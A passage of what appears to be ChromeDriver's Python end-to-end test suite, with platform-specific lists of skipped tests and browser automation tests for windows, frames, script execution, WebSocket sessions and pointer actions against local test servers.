'ChromeDriverTestLegacy.testTouchLongPressElement', 'ChromeDriverTest.testTouchFlickElement', 'ChromeDriverAndroidTest.*', ] _INTEGRATION_NEGATIVE_FILTER = [ # The following test is flaky on Windows and Mac. 'ChromeDownloadDirTest.testDownloadDirectoryOverridesExistingPreferences', # ChromeDriverLogTest tests an internal ChromeDriver feature, not needed # for integration test. 'ChromeDriverLogTest.*', # ChromeDriverPageLoadTimeoutTest is flaky, particularly on Mac. 'ChromeDriverPageLoadTimeoutTest.*', # Some trivial test cases that provide no additional value beyond what are # already tested by other test cases. 'ChromeDriverTest.testGetCurrentWindowHandle', 'ChromeDriverTest.testStartStop', # PerfTest takes a long time, requires extra setup, and adds little value # to integration testing. 'PerfTest.*', # Flaky: https://crbug.com/899919 'SessionHandlingTest.testGetSessions', # Flaky due to occasional timeout in starting Chrome 'ZChromeStartRetryCountTest.testChromeStartRetryCount', ] def _GetDesktopNegativeFilter(): filter = _NEGATIVE_FILTER + _DESKTOP_NEGATIVE_FILTER os = util.GetPlatformName() if os in _OS_SPECIFIC_FILTER: filter += _OS_SPECIFIC_FILTER[os] return filter _ANDROID_NEGATIVE_FILTER = {} _ANDROID_NEGATIVE_FILTER['chrome'] = ( _NEGATIVE_FILTER + [ # Android doesn't support switches and extensions. 'ChromeSwitchesCapabilityTest.*', 'ChromeExtensionsCapabilityTest.*', 'MobileEmulationCapabilityTest.*', 'ChromeDownloadDirTest.*', # https://crbug.com/274650 'ChromeDriverTest.testCloseWindow', # Most window operations don't make sense on Android. 'ChromeDriverTest.testWindowFullScreen', 'ChromeDriverTest.testWindowPosition', 'ChromeDriverTest.testWindowSize', 'ChromeDriverTest.testWindowRect', 'ChromeDriverTest.testWindowMaximize', 'ChromeDriverTest.testWindowMinimize', 'ChromeLogPathCapabilityTest.testChromeLogPath', # Connecting to running browser is not supported on Android. 'RemoteBrowserTest.*', # Don't enable perf testing on Android yet. 'PerfTest.*', # Android doesn't support multiple sessions on one device. 'SessionHandlingTest.testGetSessions', # Android doesn't use the chrome://print dialog. 'ChromeDriverTest.testCanSwitchToPrintPreviewDialog', # Chrome 44+ for Android doesn't dispatch the dblclick event 'ChromeDriverTest.testMouseDoubleClick', # Page cannot be loaded from file:// URI in Android unless it # is stored in device. 'ChromeDriverTest.testCanClickAlertInIframes', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2081 'ChromeDriverTest.testCloseWindowUsingJavascript', # Android doesn't support headless mode 'HeadlessInvalidCertificateTest.*', 'HeadlessChromeDriverTest.*', # Tests of the desktop Chrome launch process. 'LaunchDesktopTest.*', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2737 'ChromeDriverTest.testTakeElementScreenshot', 'ChromeDriverTest.testTakeElementScreenshotInIframe', # setWindowBounds not supported on Android 'ChromeDriverTest.testTakeLargeElementScreenshot', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2786 'ChromeDriverTest.testActionsTouchTap', 'ChromeDriverTest.testTouchDownMoveUpElement', 'ChromeDriverTest.testTouchFlickElement', # Android has no concept of tab or window, and will always lose focus # on tab creation. https://crbug.com/chromedriver/3018 'ChromeDriverTest.testNewWindowDoesNotFocus', 'ChromeDriverTest.testNewTabDoesNotFocus', # Android does not support the virtual authenticator environment. 'ChromeDriverSecureContextTest.*', # Covered by Desktop tests; can't create 2 browsers in Android 'SupportIPv4AndIPv6.testSupportIPv4AndIPv6', # Browser context management is not supported by Android 'ChromeDriverTest.testClipboardPermissions', 'ChromeDriverTest.testMidiPermissions', 'ChromeDriverTest.testMultiplePermissions', 'ChromeDriverTest.testNewWindowSameDomainHasSamePermissions', 'ChromeDriverTest.testPermissionStates', 'ChromeDriverTest.testPermissionsOpaqueOriginsThrowError', 'ChromeDriverTest.testPermissionsSameOrigin', 'ChromeDriverTest.testPermissionsSameOriginDoesNotAffectOthers', 'ChromeDriverTest.testPersistentStoragePermissions', 'ChromeDriverTest.testPushAndNotificationsPermissions', 'ChromeDriverTest.testSensorPermissions', 'ChromeDriverTest.testSettingPermissionDoesNotAffectOthers', # Android does not allow changing window size 'JavaScriptTests.*', # These tests are failing on Android # https://bugs.chromium.org/p/chromedriver/issues/detail?id=3560 'ChromeDriverTest.testTakeLargeElementViewportScreenshot', 'ChromeDriverTest.testTakeLargeElementFullPageScreenshot' ] ) _ANDROID_NEGATIVE_FILTER['chrome_stable'] = ( _ANDROID_NEGATIVE_FILTER['chrome'] + [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2350 'ChromeDriverTest.testSlowIFrame', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503 'ChromeDriverTest.testGetLogOnClosedWindow', 'ChromeDriverTest.testGetWindowHandles', 'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly', 'ChromeDriverTest.testSwitchToWindow', # Feature not yet supported in this version 'ChromeDriverTest.testGenerateTestReport', ] ) _ANDROID_NEGATIVE_FILTER['chrome_beta'] = ( _ANDROID_NEGATIVE_FILTER['chrome'] + [ # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2503 'ChromeDriverTest.testGetLogOnClosedWindow', 'ChromeDriverTest.testGetWindowHandles', 'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly', 'ChromeDriverTest.testSwitchToWindow', # Feature not yet supported in this version 'ChromeDriverTest.testGenerateTestReport', ] ) _ANDROID_NEGATIVE_FILTER['chromium'] = ( _ANDROID_NEGATIVE_FILTER['chrome'] + [] ) _ANDROID_NEGATIVE_FILTER['chromedriver_webview_shell'] = ( _ANDROID_NEGATIVE_FILTER['chrome_stable'] + [ # WebView doesn't support emulating network conditions. 'ChromeDriverTest.testEmulateNetworkConditions', 'ChromeDriverTest.testEmulateNetworkConditionsNameSpeed', 'ChromeDriverTest.testEmulateNetworkConditionsOffline', 'ChromeDriverTest.testEmulateNetworkConditionsSpeed', 'ChromeDriverTest.testEmulateNetworkConditionsName', # WebView shell doesn't support popups or popup blocking. 'ChromeDriverTest.testPopups', 'ChromeDriverTest.testDontGoBackOrGoForward', # ChromeDriver WebView shell doesn't support multiple tabs. 'ChromeDriverTest.testCloseWindowUsingJavascript', 'ChromeDriverTest.testGetWindowHandles', 'ChromeDriverTest.testSwitchToWindow', 'ChromeDriverTest.testShouldHandleNewWindowLoadingProperly', 'ChromeDriverTest.testGetLogOnClosedWindow', # The WebView shell that we test against (on KitKat) does not perform # cross-process navigations. # TODO(samuong): reenable when it does. 'ChromeDriverPageLoadTimeoutTest.testPageLoadTimeoutCrossDomain', 'ChromeDriverPageLoadTimeoutTest.' 'testHistoryNavigationWithPageLoadTimeout', # Webview shell doesn't support Alerts. 'ChromeDriverTest.testAlert', 'ChromeDriverTest.testAlertOnNewWindow', 'ChromeDesiredCapabilityTest.testUnexpectedAlertBehaviour', 'ChromeDriverTest.testAlertHandlingOnPageUnload', 'ChromeDriverTest.testClickElementAfterNavigation', 'ChromeDriverTest.testGetLogOnWindowWithAlert', 'ChromeDriverTest.testSendTextToAlert', 'ChromeDriverTest.testUnexpectedAlertOpenExceptionMessage', # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2332 'ChromeDriverTestLegacy.testTouchScrollElement', ] ) class ChromeDriverBaseTest(unittest.TestCase): """Base class for testing chromedriver functionalities.""" def __init__(self, *args, **kwargs): super(ChromeDriverBaseTest, self).__init__(*args, **kwargs) self._drivers = [] def tearDown(self): for driver in self._drivers: try: driver.Quit() except: pass def CreateDriver(self, server_url=None, server_pid=None, download_dir=None, **kwargs): if server_url is None: server_url = _CHROMEDRIVER_SERVER_URL if server_pid is None: server_pid = _CHROMEDRIVER_SERVER_PID if (not _ANDROID_PACKAGE_KEY and 'debugger_address' not in kwargs and '_MINIDUMP_PATH' in globals() and _MINIDUMP_PATH): # Environment required for minidump not supported on Android # minidumpPath will fail parsing if debugger_address is set if 'experimental_options' in kwargs: if 'minidumpPath' not in kwargs['experimental_options']: kwargs['experimental_options']['minidumpPath'] = _MINIDUMP_PATH else: kwargs['experimental_options'] = {'minidumpPath': _MINIDUMP_PATH} android_package = None android_activity = None android_process = None if _ANDROID_PACKAGE_KEY: android_package = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].package if _ANDROID_PACKAGE_KEY == 'chromedriver_webview_shell': android_activity = constants.PACKAGE_INFO[_ANDROID_PACKAGE_KEY].activity android_process = '%s:main' % android_package driver = chromedriver.ChromeDriver(server_url, server_pid, chrome_binary=_CHROME_BINARY, android_package=android_package, android_activity=android_activity, android_process=android_process, download_dir=download_dir, test_name=self.id(), **kwargs) self._drivers += [driver] return driver def WaitForNewWindow(self, driver, old_handles, check_closed_windows=True): """Wait for at least one new window to show up in 20 seconds. Args: old_handles: Handles to all old windows before the new window is added. check_closed_windows: If True, assert that no windows are closed before the new window is added. Returns: Handle to a new window. None if timeout. """ deadline = monotonic() + 20 while monotonic() < deadline: handles = driver.GetWindowHandles() if check_closed_windows: self.assertTrue(set(old_handles).issubset(handles)) new_handles = set(handles).difference(set(old_handles)) if len(new_handles) > 0: return new_handles.pop() time.sleep(0.01) return None def WaitForCondition(self, predicate, timeout=5, timestep=0.1): """Wait for a condition to become true. Args: predicate: A function that returns a boolean value. """ deadline = monotonic() + timeout while monotonic() < deadline: if predicate(): return True time.sleep(timestep) return False class ChromeDriverBaseTestWithWebServer(ChromeDriverBaseTest): @staticmethod def GlobalSetUp(): ChromeDriverBaseTestWithWebServer._http_server = webserver.WebServer( chrome_paths.GetTestData()) ChromeDriverBaseTestWithWebServer._sync_server = webserver.SyncWebServer() cert_path = os.path.join(chrome_paths.GetTestData(), 'chromedriver/invalid_ssl_cert.pem') ChromeDriverBaseTestWithWebServer._https_server = webserver.WebServer( chrome_paths.GetTestData(), cert_path) def respondWithUserAgentString(request): return {}, """ <html> <body>%s</body> </html>""" % request.GetHeader('User-Agent') def respondWithUserAgentStringUseDeviceWidth(request): return {}, """ <html> <head> <meta name="viewport" content="width=device-width,minimum-scale=1.0"> </head> <body>%s</body> </html>""" % request.GetHeader('User-Agent') ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath( '/userAgent', respondWithUserAgentString) ChromeDriverBaseTestWithWebServer._http_server.SetCallbackForPath( '/userAgentUseDeviceWidth', respondWithUserAgentStringUseDeviceWidth) if _ANDROID_PACKAGE_KEY: ChromeDriverBaseTestWithWebServer._device = ( device_utils.DeviceUtils.HealthyDevices()[0]) http_host_port = ( ChromeDriverBaseTestWithWebServer._http_server._server.server_port) sync_host_port = ( ChromeDriverBaseTestWithWebServer._sync_server._server.server_port) https_host_port = ( ChromeDriverBaseTestWithWebServer._https_server._server.server_port) forwarder.Forwarder.Map( [(http_host_port, http_host_port), (sync_host_port, sync_host_port), (https_host_port, https_host_port)], ChromeDriverBaseTestWithWebServer._device) @staticmethod def GlobalTearDown(): if _ANDROID_PACKAGE_KEY: forwarder.Forwarder.UnmapAllDevicePorts(ChromeDriverTest._device) ChromeDriverBaseTestWithWebServer._http_server.Shutdown() ChromeDriverBaseTestWithWebServer._https_server.Shutdown() @staticmethod def GetHttpUrlForFile(file_path): return ChromeDriverBaseTestWithWebServer._http_server.GetUrl() + file_path class ChromeDriverTestWithCustomCapability(ChromeDriverBaseTestWithWebServer): def testEagerMode(self): send_response = threading.Event() def waitAndRespond(): send_response.wait(10) self._sync_server.RespondWithContent('#') thread = threading.Thread(target=waitAndRespond) self._http_server.SetDataForPath('/top.html', """ <html><body> <div id='top'> <img src='%s'> </div> </body></html>""" % self._sync_server.GetUrl()) eager_driver = self.CreateDriver(page_load_strategy='eager') thread.start() start_eager = monotonic() eager_driver.Load(self._http_server.GetUrl() + '/top.html') stop_eager = monotonic() send_response.set() eager_time = stop_eager - start_eager self.assertTrue(eager_time < 9) thread.join() def testDoesntWaitWhenPageLoadStrategyIsNone(self): class HandleRequest(object): def __init__(self): self.sent_hello = threading.Event() def slowPage(self, request): self.sent_hello.wait(2) return {}, """ <html> <body>hello</body> </html>""" handler = HandleRequest() self._http_server.SetCallbackForPath('/slow', handler.slowPage) driver = self.CreateDriver(page_load_strategy='none') self.assertEquals('none', driver.capabilities['pageLoadStrategy']) driver.Load(self._http_server.GetUrl() + '/chromedriver/empty.html') start = monotonic() driver.Load(self._http_server.GetUrl() + '/slow') self.assertTrue(monotonic() - start < 2) handler.sent_hello.set() self.WaitForCondition(lambda: 'hello' in driver.GetPageSource()) self.assertTrue('hello' in driver.GetPageSource()) def testUnsupportedPageLoadStrategyRaisesException(self): self.assertRaises(chromedriver.InvalidArgument, self.CreateDriver, page_load_strategy="unsupported") def testGetUrlOnInvalidUrl(self): # Make sure we don't return 'chrome-error://chromewebdata/' (see # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1272). # Block DNS resolution for all hosts so that the navigation results # in a DNS lookup error. driver = self.CreateDriver( chrome_switches=['--host-resolver-rules=MAP * ~NOTFOUND']) self.assertRaises(chromedriver.ChromeDriverException, driver.Load, 'http://invalid/') self.assertEquals('http://invalid/', driver.GetCurrentUrl()) class ChromeDriverWebSocketTest(ChromeDriverBaseTestWithWebServer): @staticmethod def composeWebSocketUrl(server_url, session_id): return server_url.replace('http', 'ws') + '/session/' + session_id def testDefaultSession(self): driver = self.CreateDriver() self.assertFalse(driver.capabilities.has_key('webSocketUrl')) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) def testWebSocketUrlFalse(self): driver = self.CreateDriver(web_socket_url=False) self.assertFalse(driver.capabilities.has_key('webSocketUrl')) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) def testWebSocketUrlTrue(self): driver = self.CreateDriver(web_socket_url=True) self.assertTrue(driver.capabilities.has_key('webSocketUrl')) self.assertNotEqual(None, driver.GetSessionId()) self.assertEquals(driver.capabilities['webSocketUrl'], self.composeWebSocketUrl(_CHROMEDRIVER_SERVER_URL, driver.GetSessionId())) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket) def testWebSocketUrlInvalid(self): self.assertRaises(chromedriver.InvalidArgument, self.CreateDriver, web_socket_url='Invalid') def testWebSocketOneConnectionPerSession(self): driver = self.CreateDriver(web_socket_url=True) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) def testWebSocketInvalidSessionId(self): driver = self.CreateDriver(web_socket_url=True) self.assertRaises(Exception, websocket_connection.WebSocketConnection, _CHROMEDRIVER_SERVER_URL, "random_session_id_123") def testWebSocketClosedCanReconnect(self): driver = self.CreateDriver(web_socket_url=True) websocket = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket) websocket.Close() websocket2 = websocket_connection.WebSocketConnection( _CHROMEDRIVER_SERVER_URL, driver.GetSessionId()) self.assertNotEqual(None, websocket2) class ChromeDriverTest(ChromeDriverBaseTestWithWebServer): """End to end tests for ChromeDriver.""" def setUp(self): self._driver = self.CreateDriver() def testStartStop(self): pass def testGetComputedAttributes(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) firstHeaderElement = self._driver.FindElement( 'css selector', '#first-header') self.assertEquals(firstHeaderElement.GetComputedLabel(), 'header content') self.assertEquals(firstHeaderElement.GetComputedRole(), 'heading') def testGetComputedAttributesForIgnoredNode(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) ignoredHeaderElement = self._driver.FindElement( 'css selector', '#ignored-header') # GetComputedLabel for ignored node should return empty string. self.assertEquals(ignoredHeaderElement.GetComputedLabel(), '') self.assertEquals(ignoredHeaderElement.GetComputedRole(), 'Ignored') def testGetComputedAttributesForUnrenderedNode(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/accessibility.html')) unrenderedHeaderElement = self._driver.FindElement( 'css selector', '#unrendered-header') # GetComputedLabel for unrendered node should return empty string. self.assertEquals(unrenderedHeaderElement.GetComputedLabel(), '') self.assertEquals(unrenderedHeaderElement.GetComputedRole(), 'Ignored') def testLoadUrl(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) def testGetCurrentWindowHandle(self): self._driver.GetCurrentWindowHandle() # crbug.com/p/chromedriver/issues/detail?id=2995 exposed that some libraries # introduce circular function references. Functions should not be serialized # or treated as an object - this test checks that circular function # definitions are allowed (despite how they are not spec-compliant. def testExecuteScriptWithSameFunctionReference(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript("""function copyMe() { return 1; } Function.prototype.foo = copyMe; const obj = {}; obj['buzz'] = copyMe; return obj;""") def _newWindowDoesNotFocus(self, window_type='window'): current_handles = self._driver.GetWindowHandles() self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/focus_blur_test.html')) new_window = self._driver.NewWindow(window_type=window_type) text = self._driver.FindElement('css selector', '#result').GetText() self.assertTrue(new_window['handle'] not in current_handles) self.assertTrue(new_window['handle'] in self._driver.GetWindowHandles()) self.assertEquals(text, 'PASS') def testNewWindowDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='window') def testNewTabDoesNotFocus(self): self._newWindowDoesNotFocus(window_type='tab') def testCloseWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') close_returned_handles = self._driver.CloseWindow() self.assertRaises(chromedriver.NoSuchWindow, self._driver.GetCurrentWindowHandle) new_handles = self._driver.GetWindowHandles() self.assertEquals(close_returned_handles, new_handles) for old_handle in old_handles: self.assertTrue(old_handle in new_handles) for handle in new_handles: self._driver.SwitchToWindow(handle) self.assertEquals(handle, self._driver.GetCurrentWindowHandle()) close_handles = self._driver.CloseWindow() # CloseWindow quits the session if on the last window. if handle is not new_handles[-1]: from_get_window_handles = self._driver.GetWindowHandles() self.assertEquals(close_handles, from_get_window_handles) def testCloseWindowUsingJavascript(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') self._driver.ExecuteScript('window.close()') with self.assertRaises(chromedriver.NoSuchWindow): self._driver.GetTitle() def testGetWindowHandles(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() self.assertNotEqual(None, self.WaitForNewWindow(self._driver, old_handles)) def testGetWindowHandlesInPresenceOfSharedWorker(self): self._driver.Load( self.GetHttpUrlForFile('/chromedriver/shared_worker.html')) old_handles = self._driver.GetWindowHandles() def testSwitchToWindow(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) self.assertEquals( 1, self._driver.ExecuteScript('window.name = "oldWindow"; return 1;')) window1_handle = self._driver.GetCurrentWindowHandle() old_handles = self._driver.GetWindowHandles() self._driver.FindElement('css selector', '#link').Click() new_window_handle = self.WaitForNewWindow(self._driver, old_handles) self.assertNotEqual(None, new_window_handle) self._driver.SwitchToWindow(new_window_handle) self.assertEquals(new_window_handle, self._driver.GetCurrentWindowHandle()) self.assertRaises(chromedriver.NoSuchElement, self._driver.FindElement, 'css selector', '#link') self._driver.SwitchToWindow('oldWindow') self.assertEquals(window1_handle, self._driver.GetCurrentWindowHandle()) def testEvaluateScript(self): self.assertEquals(1, self._driver.ExecuteScript('return 1')) self.assertEquals(None, self._driver.ExecuteScript('')) def testEvaluateScriptWithArgs(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) script = ('document.body.innerHTML = "<div>b</div><div>c</div>";' 'return {stuff: document.querySelectorAll("div")};') stuff = self._driver.ExecuteScript(script)['stuff'] script = 'return arguments[0].innerHTML + arguments[1].innerHTML' self.assertEquals( 'bc', self._driver.ExecuteScript(script, stuff[0], stuff[1])) def testEvaluateInvalidScript(self): self.assertRaises(chromedriver.ChromeDriverException, self._driver.ExecuteScript, '{{{') def testExecuteAsyncScript(self): self._driver.SetTimeouts({'script': 3000}) self.assertRaises( chromedriver.ScriptTimeout, self._driver.ExecuteAsyncScript, 'var callback = arguments[0];' 'setTimeout(function(){callback(1);}, 10000);') self.assertEquals( 2, self._driver.ExecuteAsyncScript( 'var callback = arguments[0];' 'setTimeout(function(){callback(2);}, 300);')) def testExecuteScriptTimeout(self): self._driver.SetTimeouts({'script': 0}) self.assertRaises( chromedriver.ScriptTimeout, self._driver.ExecuteScript, 'return 2') # Regular script can still run afterwards. self._driver.SetTimeouts({'script': 1000}) self.assertEquals( 4, self._driver.ExecuteScript('return 4')) def testSwitchToFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);') self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('id') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('name') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrameByIndex(0) self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.SwitchToMainFrame() self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame(self._driver.FindElement('tag name', 'iframe')) self.assertTrue(self._driver.ExecuteScript('return window.top != window')) def testSwitchToParentFrame(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/nested.html')) self.assertTrue('One' in self._driver.GetPageSource()) self._driver.SwitchToFrameByIndex(0) self.assertTrue('Two' in self._driver.GetPageSource()) self._driver.SwitchToFrameByIndex(0) self.assertTrue('Three' in self._driver.GetPageSource()) self._driver.SwitchToParentFrame() self.assertTrue('Two' in self._driver.GetPageSource()) self._driver.SwitchToParentFrame() self.assertTrue('One' in self._driver.GetPageSource()) def testSwitchToNestedFrame(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/nested_frameset.html')) self._driver.SwitchToFrameByIndex(0) self._driver.FindElement("css selector", "#link") self._driver.SwitchToMainFrame() self._driver.SwitchToFrame('2Frame') self._driver.FindElement("css selector", "#l1") self._driver.SwitchToMainFrame() self._driver.SwitchToFrame('fourth_frame') self.assertTrue('One' in self._driver.GetPageSource()) self._driver.SwitchToMainFrame() self._driver.SwitchToFrameByIndex(4) self._driver.FindElement("css selector", "#aa1") def testExecuteInRemovedFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);' 'window.addEventListener("message",' ' function(event) { document.body.removeChild(frame); });') self.assertTrue(self._driver.ExecuteScript('return window.top == window')) self._driver.SwitchToFrame('id') self.assertTrue(self._driver.ExecuteScript('return window.top != window')) self._driver.ExecuteScript('parent.postMessage("remove", "*");') self.assertTrue(self._driver.ExecuteScript('return window.top == window')) def testSwitchToStaleFrame(self): self._driver.ExecuteScript( 'var frame = document.createElement("iframe");' 'frame.id="id";' 'frame.name="name";' 'document.body.appendChild(frame);') element = self._driver.FindElement("css selector", "#id") self._driver.SwitchToFrame(element) self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) with self.assertRaises(chromedriver.StaleElementReference): self._driver.SwitchToFrame(element) def testGetTitle(self): script = 'document.title = "title"; return 1;' self.assertEquals(1, self._driver.ExecuteScript(script)) self.assertEquals('title', self._driver.GetTitle()) def testGetPageSource(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/page_test.html')) self.assertTrue('Link to empty.html' in self._driver.GetPageSource()) def testFindElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') self.assertTrue( isinstance(self._driver.FindElement('tag name', 'div'), webelement.WebElement)) def testNoSuchElementExceptionMessage(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') self.assertRaisesRegexp(chromedriver.NoSuchElement, 'no such element: Unable ' 'to locate element: {"method":"tag name",' '"selector":"divine"}', self._driver.FindElement, 'tag name', 'divine') def testFindElements(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>a</div><div>b</div>";') divs = self._driver.FindElements('tag name', 'div') self.assertTrue(isinstance(divs, list)) self.assertEquals(2, len(divs)) for div in divs: self.assertTrue(isinstance(div, webelement.WebElement)) def testFindChildElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div><br><br></div><div><a></a></div>";') element = self._driver.FindElement('tag name', 'div') self.assertTrue( isinstance(element.FindElement('tag name', 'br'), webelement.WebElement)) def testFindChildElements(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div><br><br></div><div><br></div>";') element = self._driver.FindElement('tag name', 'div') brs = element.FindElements('tag name', 'br') self.assertTrue(isinstance(brs, list)) self.assertEquals(2, len(brs)) for br in brs: self.assertTrue(isinstance(br, webelement.WebElement)) def testClickElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) div = self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.addEventListener("click", function() {' ' div.innerHTML="new<br>";' '});' 'return div;') div.Click() self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testClickElementInSubFrame(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/frame_test.html')) frame = self._driver.FindElement('tag name', 'iframe') self._driver.SwitchToFrame(frame) # Test clicking element in the sub frame. self.testClickElement() def testClickElementAfterNavigation(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/link_nav.html')) link = self._driver.FindElement('css selector', '#l1') link.Click() alert_button = self._driver.FindElement('css selector', '#aa1') alert_button.Click() self.assertTrue(self._driver.IsAlertOpen()) def testActionsMouseMove(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("mouseover", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "actions": [{"duration": 32, "type": "pause"}], "id": "0", "type": "none" }, { "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("click", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseDoubleClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'div.addEventListener("dblclick", function() {' ' var div = document.getElementsByTagName("div")[0];' ' div.innerHTML="new<br>";' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}], "parameters": {"pointerType": "mouse"}, "id": "pointer1"}]}) self._driver.PerformActions(actions) self.assertEquals(1, len(self._driver.FindElements('tag name', 'br'))) def testActionsMouseTripleClick(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) self._driver.ExecuteScript( 'document.body.innerHTML = "<div>old</div>";' 'var div = document.getElementsByTagName("div")[0];' 'div.style["width"] = "100px";' 'div.style["height"] = "100px";' 'window.click_counts = [];' 'div.addEventListener("click", event => {' ' window.click_counts.push(event.detail);' '});' 'return div;') actions = ({"actions": [{ "type":"pointer", "actions":[{"type": "pointerMove", "x": 10, "y": 10}, {"type": "pointerDown", "button": 0}, {"type": "pointerUp", "button": 0}, {"type": "pointerDown", "button": 0}, {"type": 